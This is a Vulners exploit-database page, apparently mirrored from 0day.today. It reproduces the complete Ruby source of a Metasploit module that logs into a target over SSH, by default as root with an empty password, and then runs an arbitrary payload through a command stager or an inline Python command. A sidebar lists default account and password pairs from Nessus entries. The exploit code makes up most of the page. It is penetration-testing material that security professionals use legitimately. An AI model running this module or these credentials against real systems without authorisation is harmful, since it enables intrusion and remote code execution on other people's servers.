Vulners
Lucene search
SSH - User Code Execution Exploit
| Reporter | Title | Published | Views | Family All 221 |
|---|---|---|---|---|
 | SSH User Code Execution Vulnerability | 16 May 201300:00 | – | zdt |
| Varnish Cache CLI Interface Remote Code Execution Exploit | 21 Dec 201400:00 | – | zdt |
 | Unpassworded '4Dgifts' Account | 20 Feb 200300:00 | – | nessus |
| Default Password '666666' for '666666' Account | 28 Oct 201600:00 | – | nessus |
| Default Password '888888' for '888888' Account | 28 Oct 201600:00 | – | nessus |
| Unprotected 'admin' Account | 28 Oct 201600:00 | – | nessus |
| Default Password 'password' for 'admin1' Account | 28 Oct 201600:00 | – | nessus |
| Default Password '1234' for 'administrator' Account | 28 Oct 201600:00 | – | nessus |
| Default Password 'meinsm' for 'Administrator' Account | 28 Oct 201600:00 | – | nessus |
| Default Password '1111' for 'admin' Account | 28 Oct 201600:00 | – | nessus |
10
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/ssh'
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::SSH
attr_accessor :ssh_socket
def initialize
super(
'Name' => 'SSH User Code Execution',
'Description' => %q{
This module connects to the target system and executes the necessary
commands to run the specified payload via SSH. If a native payload is
specified, an appropriate stager will be used.
},
'Author' => ['Spencer McIntyre', 'Brandon Knight'],
'References' =>
[
[ 'CVE', '1999-0502'] # Weak password
],
'License' => MSF_LICENSE,
'Privileged' => true,
'DefaultOptions' =>
{
'PrependFork' => 'true',
'EXITFUNC' => 'process'
},
'Payload' =>
{
'Space' => 4096,
'BadChars' => "",
'DisableNops' => true
},
'Platform' => %w{ linux osx python },
'Targets' =>
[
[ 'Linux x86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
[ 'Linux x64',
{
'Arch' => ARCH_X64,
'Platform' => 'linux'
}
],
[ 'OSX x86',
{
'Arch' => ARCH_X86,
'Platform' => 'osx'
}
],
[ 'Python',
{
'Arch' => ARCH_PYTHON,
'Platform' => 'python'
}
]
],
'CmdStagerFlavor' => %w{ bourne echo printf },
'DefaultTarget' => 0,
# For the CVE
'DisclosureDate' => 'Jan 01 1999'
)
register_options(
[
OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),
OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
OptString.new('RHOST', [ true, "The target address" ]),
Opt::RPORT(22)
], self.class
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])
]
)
end
def execute_command(cmd, opts = {})
vprint_status("Executing #{cmd}")
begin
Timeout.timeout(3) do
self.ssh_socket.exec!("#{cmd}\n")
end
rescue ::Exception
end
end
def do_login(ip, user, pass, port)
factory = ssh_socket_factory
opt_hash = {
:auth_methods => ['password', 'keyboard-interactive'],
:port => port,
:use_agent => false,
:config => false,
:password => pass,
:proxy => factory,
:non_interactive => true
}
opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
begin
self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
rescue Rex::ConnectionError
fail_with(Failure::Unreachable, 'Disconnected during negotiation')
rescue Net::SSH::Disconnect, ::EOFError
fail_with(Failure::Disconnected, 'Timed out during negotiation')
rescue Net::SSH::AuthenticationFailed
fail_with(Failure::NoAccess, 'Failed authentication')
rescue Net::SSH::Exception => e
fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
end
if not self.ssh_socket
fail_with(Failure::Unknown, 'Failed to start SSH socket')
end
return
end
def exploit
do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")
if target['Platform'] == 'python'
execute_command("python -c \"#{payload.encoded}\"")
else
execute_cmdstager({:linemax => 500})
end
self.ssh_socket.close
end
end
# 0day.today [2018-01-02] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Mar 2017 00:00Current
9.5High risk
Vulners AI Score9.5
EPSS0.37089